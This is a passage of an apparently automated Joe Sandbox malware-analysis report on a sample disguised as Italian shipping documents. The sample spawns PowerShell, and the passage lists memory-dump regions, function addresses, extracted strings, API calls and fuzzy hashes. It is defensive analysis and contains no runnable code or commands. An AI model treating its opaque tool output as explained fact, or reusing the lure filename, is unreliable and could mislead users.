Associated: 00000000.00000002.1701169618.0000000073A92000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1701225152.0000000073A93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1701247983.0000000073A94000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73a90000_Documenti di spedizione 0009333000459595995.jbxd

Similarity

API ID: lstrlen$lstrcmpi
String ID:
API String ID: 1808961391-0
Opcode ID: 83ba60766247e4a9449ccf68cc8a1280aa01dad58b7693ab21124f4bf95a33e7
Instruction ID: 4215216eecfac677316e96c28bdad94228ad9b41f5a9aa6479b826c0b11d529a
Opcode Fuzzy Hash: 83ba60766247e4a9449ccf68cc8a1280aa01dad58b7693ab21124f4bf95a33e7
Instruction Fuzzy Hash: C4018136200118BFEB029FA5DD81E9D77E8EF45350726407AF904EB224D770DE41DBA8

Function 00405FAC Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FBC
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405FD4
CharNextA.USER32(00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FE5
lstrlenA.KERNEL32(00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FEE

Memory Dump Source

Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
Instruction ID: e9567a821587a5f0376c4e2be66d4cfc8c6f540c5076303c4651ac02cb4e93c6
Opcode Fuzzy Hash: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
Instruction Fuzzy Hash: E1F09631105519FFC7029FA5DE00D9FBBA8EF05350B2540B9F840F7250D678DE01AB69

Analysis Process: powershell.exePID: 5480, Parent PID: 6728COMMON

Executed Functions

Function 00C1EBD8 Relevance: 1.5, Strings: 1, Instructions: 281COMMON

Download Yara Rule

Strings

\V#k, xrefs: 00C1EE8F

Memory Dump Source

Source File: 00000001.00000002.2376861949.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c10000_powershell.jbxd

Similarity

API ID:
String ID: \V#k
API String ID: 0-2892493493
Opcode ID: 3270f1c5dc435147fd6d86371afeeff843b19f6fcb4659c93dfa481df91a0668
Instruction ID: dc64a57cf12ccbf023fb00162a22c336518a4d703f5ecb27cdc5f59c56afdb21
Opcode Fuzzy Hash: 3270f1c5dc435147fd6d86371afeeff843b19f6fcb4659c93dfa481df91a0668
Instruction Fuzzy Hash: 75B16C70E00219CFDF10CFA9D9857DDBBF2AF89304F148129E825E7294EB749982DB81

Function 00C1F4A8 Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2376861949.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c10000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1bbee7387df0c7f9e9b06ff7939ba5b17a8b209d3d9814bc4e1c4c0dfda9e361
Instruction ID: b00e708f71ee5bb0ba3f55409627576c39e62119c62ead58a232726465893d22
Opcode Fuzzy Hash: 1bbee7387df0c7f9e9b06ff7939ba5b17a8b209d3d9814bc4e1c4c0dfda9e361
Instruction Fuzzy Hash: 33B13B70E002098FDB10CFA9D9857DDBBF2AF89314F24853DE425E7294EB749986DB81

Function 07124348 Relevance: 28.6, Strings: 22, Instructions: 1099COMMON

Download Yara Rule

Strings

4'fq, xrefs: 071249B4
4'fq, xrefs: 071249A8
4'fq, xrefs: 07124711
4'fq, xrefs: 07124B04
4'fq, xrefs: 07124A50
4'fq, xrefs: 07124BAF
4'fq, xrefs: 07124DA2
4'fq, xrefs: 071245CA
4'fq, xrefs: 07124900
4'fq, xrefs: 07125016
4'fq, xrefs: 0712471D
4'fq, xrefs: 0712490C
4'fq, xrefs: 071245BE
4'fq, xrefs: 07124D96
4'fq, xrefs: 07124672
4'fq, xrefs: 0712500A
4'fq, xrefs: 071247B9
4'fq, xrefs: 07124666
4'fq, xrefs: 071247C5
4'fq, xrefs: 07124AF8
4'fq, xrefs: 07124BA3
4'fq, xrefs: 07124A5C

Memory Dump Source

Source File: 00000001.00000002.2390650443.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7120000_powershell.jbxd

Similarity

API ID:
String ID: 4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq
API String ID: 0-3727103184
Opcode ID: 77652ab6e42c2da54a9b289cb2ff73e6a247bcf660c33a2beac2827e6a95944d
Instruction ID: f86e7869a9767858e86079bbc01c0e8f49d3c60e4c78cba19ff59bd28a92714b
Opcode Fuzzy Hash: 77652ab6e42c2da54a9b289cb2ff73e6a247bcf660c33a2beac2827e6a95944d
Instruction Fuzzy Hash: 26A2A8B4B10114CFE724CBA8C585B9ABBB2AF84308F20956DD915AF781CB72DC55DF81

Function 07124347 Relevance: 14.6, Strings: 11, Instructions: 876COMMON

Download Yara Rule

Strings

4'fq, xrefs: 071249A8
4'fq, xrefs: 071245BE
4'fq, xrefs: 07124D96
4'fq, xrefs: 07124711
4'fq, xrefs: 0712500A
4'fq, xrefs: 071247B9
4'fq, xrefs: 07124666
4'fq, xrefs: 07124A50
4'fq, xrefs: 07124AF8
4'fq, xrefs: 07124900
4'fq, xrefs: 07124BA3

Memory Dump Source

Source File: 00000001.00000002.2390650443.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7120000_powershell.jbxd

Similarity

API ID:
String ID: 4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq
API String ID: 0-477184059
Opcode ID: 0b2c9167bb54e9a1d40bba24caee54f006dfdb58d0cade622780c42e59d5ddae
Instruction ID: 608ee5538133d64a628cf6ba6c3fe55cf71662949872a2be7d12d518602bbedc
Opcode Fuzzy Hash: 0b2c9167bb54e9a1d40bba24caee54f006dfdb58d0cade622780c42e59d5ddae
Instruction Fuzzy Hash: 8A8274B4B00254CFE724CB58C580F9ABBB2AF85308F21956DE9156B782CB76EC55CF81

Function 0712B8A0 Relevance: 14.3, Strings: 11, Instructions: 595COMMON

Download Yara Rule

Strings

4'fq, xrefs: 0712BA0C
-}k, xrefs: 0712C1AC
4'fq, xrefs: 0712BA18
$fq, xrefs: 0712B9DD
x.}k, xrefs: 0712C175
4'fq, xrefs: 0712BF0B
4'fq, xrefs: 0712BFAF
$fq, xrefs: 0712B982
4'fq, xrefs: 0712BF99
$fq, xrefs: 0712B9ED
4'fq, xrefs: 0712BEF5

Memory Dump Source

Source File: 00000001.00000002.2390650443.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7120000_powershell.jbxd

Similarity

API ID:
String ID: 4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$x.}k$$fq$$fq$$fq$-}k
API String ID: 0-3674204542
Opcode ID: 12914cd1ec7226ba39b6915e64285974309656cbedd564e1bc6c9da8406c33d8
Instruction ID: 70018964b2be723e0f60d6ce59d038151a2a127ad190d91e2403ac647e84ca34
Opcode Fuzzy Hash: 12914cd1ec7226ba39b6915e64285974309656cbedd564e1bc6c9da8406c33d8
Instruction Fuzzy Hash: 024272B0B002198FDB24DF64C951BEBBBB2AF85304F1085A9E509AB785DB31DD81DF91

Function 07123170 Relevance: 11.0, Strings: 8, Instructions: 983COMMON

Download Yara Rule

Strings

4'fq, xrefs: 071232C9
4'fq, xrefs: 07123C52
x.}k, xrefs: 07123EBD
tPfq, xrefs: 07123460
4'fq, xrefs: 07123C5E
4'fq, xrefs: 071232D5
tPfq, xrefs: 07123454
-}k, xrefs: 07123F02

Memory Dump Source

Source File: 00000001.00000002.2390650443.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7120000_powershell.jbxd

Similarity

API ID:
String ID: 4'fq$4'fq$4'fq$4'fq$tPfq$tPfq$x.}k$-}k
API String ID: 0-2297435406
Opcode ID: b0b92cd1dcd2494686b6dcd121210ded740f5c2b93ab2a102fe33a5d67dba8c2
Instruction ID: 8b07ea2b164e9e39ce8c0836b735dbb949a87462b2847af5bba3118cd9f62a7d
Opcode Fuzzy Hash: b0b92cd1dcd2494686b6dcd121210ded740f5c2b93ab2a102fe33a5d67dba8c2
Instruction Fuzzy Hash: 8D82E6B4B102149FDB24CB58C941BAABBB2EF85314F51C0A9E9099F381CF35DD86DB91

Function 00C1B0E8 Relevance: 10.5, Strings: 8, Instructions: 518COMMON

Download Yara Rule

Strings

h]#k, xrefs: 00C1B312
Hjq, xrefs: 00C1B1AE
8N#k, xrefs: 00C1C1D8
I#k, xrefs: 00C1BCA4
h]#k, xrefs: 00C1B7B6
h]#k, xrefs: 00C1BC78
$fq, xrefs: 00C1B302
$fq, xrefs: 00C1B667

Memory Dump Source

Source File: 00000001.00000002.2376861949.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c10000_powershell.jbxd

Similarity

API ID:
String ID: 8N#k$Hjq$h]#k$h]#k$h]#k$$fq$$fq$I#k
API String ID: 0-3496805600
Opcode ID: 6a3fe92228ab5a8bd1402279f169dfd2cf5626014f026a7125a2e44294f929ca
Instruction ID: 24e11d4310ee6b4b352fd3374c54cb9769ef214c139f5aefa389f0158e03bf92
Opcode Fuzzy Hash: 6a3fe92228ab5a8bd1402279f169dfd2cf5626014f026a7125a2e44294f929ca
Instruction Fuzzy Hash: 29222D34B001188FCB25DB25C8957EEB7F2AF8A304F1480A9E509AB365DF359E85DF81

Function 07121278 Relevance: 8.1, Strings: 6, Instructions: 593COMMON

Download Yara Rule

Strings

tPfq, xrefs: 07121303
4'fq, xrefs: 071215E6
4'fq, xrefs: 07121874
4'fq, xrefs: 07121868
tPfq, xrefs: 0712130F
4'fq, xrefs: 071215F2

Memory Dump Source

Source File: 00000001.00000002.2390650443.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7120000_powershell.jbxd

Similarity

API ID:
String ID: 4'fq$4'fq$4'fq$4'fq$tPfq$tPfq
API String ID: 0-3815971827
Opcode ID: 1c29895abcbaf7e29e761759b1084063367a089f6af942ad7ae98dcc529efd6e
Instruction ID: 953f8e8ef4969ece57f8111721e628886a5e89a700dd12488246bf49f50ce57c
Opcode Fuzzy Hash: 1c29895abcbaf7e29e761759b1084063367a089f6af942ad7ae98dcc529efd6e
Instruction Fuzzy Hash: 0E32D3B1B00218EFD715DB98C541BAABBB2EF85314F14C069E9059F791CB72EC42EB91

Function 071254A8 Relevance: 7.9, Strings: 6, Instructions: 373COMMON

Download Yara Rule

Strings

x.}k, xrefs: 0712587C
4'fq, xrefs: 071257B1
-}k, xrefs: 071258C1
4'fq, xrefs: 071257BD
4'fq, xrefs: 07125830
4'fq, xrefs: 0712583C

Memory Dump Source

Source File: 00000001.00000002.2390650443.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7120000_powershell.jbxd

Similarity

API ID:
String ID: 4'fq$4'fq$4'fq$4'fq$x.}k$-}k
API String ID: 0-3699293204
Opcode ID: 4dcd879626053826b4fe7910192ecc9a4c5930cc95faafdbf3fa945184d7ef55
Instruction ID: 0c7d24b81fd206afc4aec87def61be41cf5c587f99be8da8a05a64c44a33f1b2
Opcode Fuzzy Hash: 4dcd879626053826b4fe7910192ecc9a4c5930cc95faafdbf3fa945184d7ef55
Instruction Fuzzy Hash: 96E1E2B4B102148FDB14DBA8C591BAEBBB3AF84304F21C469E5016F795CF31EC569B92

Function 0712C4E8 Relevance: 5.5, Strings: 4, Instructions: 491COMMON

Download Yara Rule

Strings

-}k, xrefs: 0712CC20
x.}k, xrefs: 0712CBDB
4'fq, xrefs: 0712C9C1
4'fq, xrefs: 0712C9B5

Memory Dump Source

Source File: 00000001.00000002.2390650443.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7120000_powershell.jbxd

Similarity

API ID:
String ID: 4'fq$4'fq$x.}k$-}k
API String ID: 0-2401030382
Opcode ID: cc31e4a577ad5acfe16fbf75c2e072057fe193ae5853097881137f8794bcf4c7
Instruction ID: 6b3f9dbd676b3012aa89e1f9755918bec72ad539e64a3e5b924269f463905c2a
Opcode Fuzzy Hash: cc31e4a577ad5acfe16fbf75c2e072057fe193ae5853097881137f8794bcf4c7
Instruction Fuzzy Hash: E92252B07012149FD764DB58C951BDBBBA2AF85304F118499E909AF781CB72ED82CFD2

Function 0712BAF8 Relevance: 5.4, Strings: 4, Instructions: 398COMMON

Download Yara Rule

Strings

-}k, xrefs: 0712C1AC
x.}k, xrefs: 0712C175
4'fq, xrefs: 0712BF99
4'fq, xrefs: 0712BEF5

Memory Dump Source

Source File: 00000001.00000002.2390650443.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7120000_powershell.jbxd

Similarity

API ID:
String ID: 4'fq$4'fq$x.}k$-}k
API String ID: 0-2401030382
Opcode ID: d391d95e532ee44b73074f4064c493a4608768233b1de5d592ed53298051ddf7
Instruction ID: af536b6d99d2f6b3137bcf62312ae9321518faf88e49fbb3476f8d0b754c6787
Opcode Fuzzy Hash: d391d95e532ee44b73074f4064c493a4608768233b1de5d592ed53298051ddf7
Instruction Fuzzy Hash: E1025EB0A01218CFD724DB54C951BDBBBB2AF89304F1085A9E509AB785CB72ED81DF91

Function 071254A2 Relevance: 5.3, Strings: 4, Instructions: 300COMMON

Download Yara Rule

Strings

x.}k, xrefs: 0712587C
4'fq, xrefs: 071257B1
-}k, xrefs: 071258C1
4'fq, xrefs: 07125830

Memory Dump Source

Source File: 00000001.00000002.2390650443.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7120000_powershell.jbxd

Similarity

API ID:
String ID: 4'fq$4'fq$x.}k$-}k
API String ID: 0-2401030382
Opcode ID: 2f396590486885f69215ac00b091f6c192ce8dd6a92bf2e911092fc17c057cbd
Instruction ID: 1c34b212087ffa3ea1a03a4968fa30c392fc23b8815da14a9153d38fa53fd738
Opcode Fuzzy Hash: 2f396590486885f69215ac00b091f6c192ce8dd6a92bf2e911092fc17c057cbd
Instruction Fuzzy Hash: 25C1C1B4B002149FDB25CB58C581BAEBBB3AF88308F15C459E9016F395CB71EC56DB91

Function 07123F98 Relevance: 4.4, Strings: 3, Instructions: 644COMMON

Download Yara Rule

Strings

4'fq, xrefs: 07123C52
x.}k, xrefs: 07123EBD
-}k, xrefs: 07123F02

Memory Dump Source

Source File: 00000001.00000002.2390650443.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7120000_powershell.jbxd

Similarity

API ID:
String ID: 4'fq$x.}k$-}k
API String ID: 0-2584690068
Opcode ID: c997991dc7a65e354a906ad61eeda087e5e2aceb4cff46750bb7af2875daf25f
Instruction ID: 113a6ebafd6deaef9a46e9e51bd1a070d5c3f86bdb8e611f92eba94b152c5899
Opcode Fuzzy Hash: c997991dc7a65e354a906ad61eeda087e5e2aceb4cff46750bb7af2875daf25f
Instruction Fuzzy Hash: 645291B4B102149FD724DB58C941F9ABBB2BF84314F51C099E909AF791CB32ED868F91

Function 07123508 Relevance: 4.4, Strings: 3, Instructions: 628COMMON

Download Yara Rule

Strings

4'fq, xrefs: 07123C52
x.}k, xrefs: 07123EBD
-}k, xrefs: 07123F02

Memory Dump Source

Source File: 00000001.00000002.2390650443.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7120000_powershell.jbxd

Similarity

API ID:
String ID: 4'fq$x.}k$-}k
API String ID: 0-2584690068
Opcode ID: 51d51a95dc020940ad3dd1158900bf3367bd8e6f32d4fc757f38ee1852b579c5
Instruction ID: 5d56ac5d6bf8c7da95691f8c17447887892114573d19cdf731fe8cbed0397453
Opcode Fuzzy Hash: 51d51a95dc020940ad3dd1158900bf3367bd8e6f32d4fc757f38ee1852b579c5
Instruction Fuzzy Hash: AE427EB4B102149FD724CB58C940F9ABBB2FF84314F51C499E909AB791CB32ED868F91

Function 0712CCB9 Relevance: 4.4, Strings: 3, Instructions: 620COMMON

Download Yara Rule

Strings

-}k, xrefs: 0712CC20
x.}k, xrefs: 0712CBDB
4'fq, xrefs: 0712C9B5

Memory Dump Source

Source File: 00000001.00000002.2390650443.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7120000_powershell.jbxd

Similarity

API ID:
String ID: 4'fq$x.}k$-}k
API String ID: 0-2584690068
Opcode ID: b4bf98b20ae5f5ce7fb88eda9a0383654e6c72420cb608bb9976271ec11e7a29
Instruction ID: a6e34fe1460af23f8667f25933758791e38e07902ea50d8c0aa5c85aed5a5c2e
Opcode Fuzzy Hash: b4bf98b20ae5f5ce7fb88eda9a0383654e6c72420cb608bb9976271ec11e7a29
Instruction Fuzzy Hash: 174263B47012149FD724DB58C951BDBBBA2AF85304F108499E909AF791CB72ED82CFD2

Function 071240A9 Relevance: 4.2, Strings: 3, Instructions: 486COMMON

Download Yara Rule

Strings

4'fq, xrefs: 07123C52
x.}k, xrefs: 07123EBD
-}k, xrefs: 07123F02

Memory Dump Source

Source File: 00000001.00000002.2390650443.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7120000_powershell.jbxd

Similarity

API ID:
String ID: 4'fq$x.}k$-}k
API String ID: 0-2584690068
Opcode ID: 309760130d818aae41cdccecf3e9078ed8a2fa3fde9640d7f25559ee495d721b
Instruction ID: 5a113b61412491d1561ced7f815a0124bdca2e65998d20a46f8f2635568837df
Opcode Fuzzy Hash: 309760130d818aae41cdccecf3e9078ed8a2fa3fde9640d7f25559ee495d721b
Instruction Fuzzy Hash: A92290747102149FD724DB18C950F9ABBB2AF84318F51C499E909AF391CF72ED868F92

Function 0712CDA2 Relevance: 4.2, Strings: 3, Instructions: 466COMMON

Download Yara Rule

Strings

-}k, xrefs: 0712CC20
x.}k, xrefs: 0712CBDB
4'fq, xrefs: 0712C9B5

Memory Dump Source

Source File: 00000001.00000002.2390650443.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7120000_powershell.jbxd

Similarity

API ID:
String ID: 4'fq$x.}k$-}k
API String ID: 0-2584690068
Opcode ID: 6b4acc88ba81621db4498417d8ef7f4d0cd198ee047aa1d1ce30a6b4df14647c
Instruction ID: 7a09f04b1b7ae497acb80cba2f02910b54a06973ac5453dc27345af8614095b4
Opcode Fuzzy Hash: 6b4acc88ba81621db4498417d8ef7f4d0cd198ee047aa1d1ce30a6b4df14647c
Instruction Fuzzy Hash: 661251B07012149FD724DB58C951FDBBBA2AB85304F108499E909AF781CB72ED82CFD2

Function 00C1F214 Relevance: 2.7, Strings: 2, Instructions: 184COMMON

Download Yara Rule

Strings

\V#k, xrefs: 00C1F28F
\V#k, xrefs: 00C1F3E2

Memory Dump Source

Source File: 00000001.00000002.2376861949.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c10000_powershell.jbxd

Similarity

API ID:
String ID: \V#k$\V#k
API String ID: 0-3290571896
Opcode ID: 7eb319ac26a56ec0302ffb95ac858df3e1f1358cdcf159996348ba5daed7d9e7
Instruction ID: e15f1984b779439503e438339fba53be3103ef6ab6be95bf9aa7dfffffd44a8c
Opcode Fuzzy Hash: 7eb319ac26a56ec0302ffb95ac858df3e1f1358cdcf159996348ba5daed7d9e7
Instruction Fuzzy Hash: 9D715DB0E00209DFDF10CFA9D8857DEBBF1AF89314F148129E428A7254DB749982DF91

Function 00C1F220 Relevance: 2.7, Strings: 2, Instructions: 180COMMON

Download Yara Rule

Strings

\V#k, xrefs: 00C1F28F
\V#k, xrefs: 00C1F3E2

Memory Dump Source

Source File: 00000001.00000002.2376861949.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c10000_powershell.jbxd

Similarity

API ID:
String ID: \V#k$\V#k
API String ID: 0-3290571896
Opcode ID: bfe1a22ad9f5f8f2e868c99352f10cdfeeec517d9f66949d6368f40908d8f5c5
Instruction ID: dd83a54daa246ba827a385991fff9615dfd7163f58cc682c1b88dff81b4478f2
Opcode Fuzzy Hash: bfe1a22ad9f5f8f2e868c99352f10cdfeeec517d9f66949d6368f40908d8f5c5
Instruction Fuzzy Hash: 75714BB0E00209CFDF14CFA9C9857DEBBF2AF89314F14812DE429A7254DB749982DB91

Function 07120C78 Relevance: 2.7, Strings: 2, Instructions: 172COMMON

Download Yara Rule

Strings

tPfq, xrefs: 07120D1C
tPfq, xrefs: 07120D28

Memory Dump Source

Source File: 00000001.00000002.2390650443.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7120000_powershell.jbxd

Similarity

API ID:
String ID: tPfq$tPfq
API String ID: 0-2659045182
Opcode ID: 12d9f46a3174932428c718e3eedc6a10b54b8848e16250deaa51c78b495f66bc
Instruction ID: 98e55642984daab82e2b6955e01967c4abf73c044044d108fbcac4070be1f643
Opcode Fuzzy Hash: 12d9f46a3174932428c718e3eedc6a10b54b8848e16250deaa51c78b495f66bc
Instruction Fuzzy Hash: A0516DB17113699FCB254BA8C8017A7BBA6DFCA311F14817AD145CB2D1CB31D897D3A1

Function 00C1BDA0 Relevance: 2.6, Strings: 2, Instructions: 92COMMON

Download Yara Rule

Strings

I#k, xrefs: 00C1BCA4
h]#k, xrefs: 00C1BC78

Memory Dump Source

Source File: 00000001.00000002.2376861949.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c10000_powershell.jbxd

Similarity

API ID:
String ID: h]#k$I#k
API String ID: 0-1097469254
Opcode ID: 86e52817255d3b0f8a7e56179db9177c25484156971b3252dc07137d7f343e87
Instruction ID: 660a277f0f8fbfa992cd152906f796c44d7e61da16b33945a3587dcbe7747928
Opcode Fuzzy Hash: 86e52817255d3b0f8a7e56179db9177c25484156971b3252dc07137d7f343e87
Instruction Fuzzy Hash: 7E311B30A011188FCB25EB64D8956EEB7F2BF8A305F1044E9D409AB351CB369E86DF81

Function 0712D1CC Relevance: 1.6, Strings: 1, Instructions: 362COMMON

Download Yara Rule

Strings

x.}k, xrefs: 0712D52B

Memory Dump Source

Source File: 00000001.00000002.2390650443.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7120000_powershell.jbxd

Similarity

API ID:
String ID: x.}k
API String ID: 0-4260201454
Opcode ID: 7f692173c90a6f28d548b609563ed95092cb58d982fdd2a9dfbcbaa9afc728ae
Instruction ID: 4a9dc873fd94e6736398ab9fe61f8c89d0b6b5b80ccaac50e48ae8cd3f7b08d9
Opcode Fuzzy Hash: 7f692173c90a6f28d548b609563ed95092cb58d982fdd2a9dfbcbaa9afc728ae
Instruction Fuzzy Hash: 66F171B0B00228CFDB64DB68C951B9AB772BF85304F1184A9E5496B781CB31ED86DF91

Function 00C1EBCC Relevance: 1.5, Strings: 1, Instructions: 281COMMON

Download Yara Rule

Strings

\V#k, xrefs: 00C1EE8F

Memory Dump Source

Source File: 00000001.00000002.2376861949.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c10000_powershell.jbxd

Similarity

API ID:
String ID: \V#k
API String ID: 0-2892493493
Opcode ID: 56d741e898228178ad031502db3953f797339bc99051b3134be1085205fbf7d9
Instruction ID: aeda6c49008f00bc5b7799b78a1694fea53db321e4e2f0530a2506047a6dddfa
Opcode Fuzzy Hash: 56d741e898228178ad031502db3953f797339bc99051b3134be1085205fbf7d9
Instruction Fuzzy Hash: ACB16B70E00219CFDF10CFA9D8857DDBBF2AF89314F148129E825E7294EB749986DB81

Function 00C1D05C Relevance: 1.4, Strings: 1, Instructions: 122COMMON

Download Yara Rule

Strings

$fq, xrefs: 00C1D0DC

Memory Dump Source

Source File: 00000001.00000002.2376861949.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c10000_powershell.jbxd

Similarity

API ID:
String ID: $fq
API String ID: 0-12477121
Opcode ID: 59cf2cbf6c521bd7d7054c3a547849db10386b3958e0e5859422ec021cf2d5e8
Instruction ID: 5222ca19eb08124dd1692d942afe5222527aa09b6687a3afb4d6275dd77f76fc
Opcode Fuzzy Hash: 59cf2cbf6c521bd7d7054c3a547849db10386b3958e0e5859422ec021cf2d5e8
Instruction Fuzzy Hash: 3D5105B1D00349DFDB10CFA9C981ADEBBB5AF48310F24812AD419AB254DB746985CF91

Function 00C1D068 Relevance: 1.4, Strings: 1, Instructions: 117COMMON

Download Yara Rule

Strings

$fq, xrefs: 00C1D0DC

Memory Dump Source

Source File: 00000001.00000002.2376861949.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c10000_powershell.jbxd

Similarity

API ID:
String ID: $fq
API String ID: 0-12477121
Opcode ID: aa331cb7ce79dd64820219a14bc00ef883361f1c1a85076e51ee699793a82c07
Instruction ID: fbe17131df1102bd1bc3cd06bfb200759434b89e6bd5f727b33b37630df4f527
Opcode Fuzzy Hash: aa331cb7ce79dd64820219a14bc00ef883361f1c1a85076e51ee699793a82c07
Instruction Fuzzy Hash: 8F51F5B1E00309DFDB10CF99C985BDEBBB5BF48310F24812AE519AB254DB746985CF91

Function 07125948 Relevance: 1.4, Strings: 1, Instructions: 102COMMON

Download Yara Rule

Strings

x.}k, xrefs: 071259FA

Memory Dump Source

Source File: 00000001.00000002.2390650443.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7120000_powershell.jbxd

Similarity

API ID:
String ID: x.}k
API String ID: 0-4260201454
Opcode ID: 74436a84bd53572d00fbb86d57fbd60f2d3bd0034dc99c3e52e1fef9c4a9f5ff
Instruction ID: 6403645815a48e3089a78eeadca3b1cb364cc4a4c0cf5a2ca903bbb44f0b55db
Opcode Fuzzy Hash: 74436a84bd53572d00fbb86d57fbd60f2d3bd0034dc99c3e52e1fef9c4a9f5ff
Instruction Fuzzy Hash: F231D378B401109FE71497A8C991BAE7AA3AFC4354F50C428F9016F791CF75EC429B92

Function 00C19B50 Relevance: .6, Instructions: 578COMMON

Download Yara Rule

Memory Dump Source

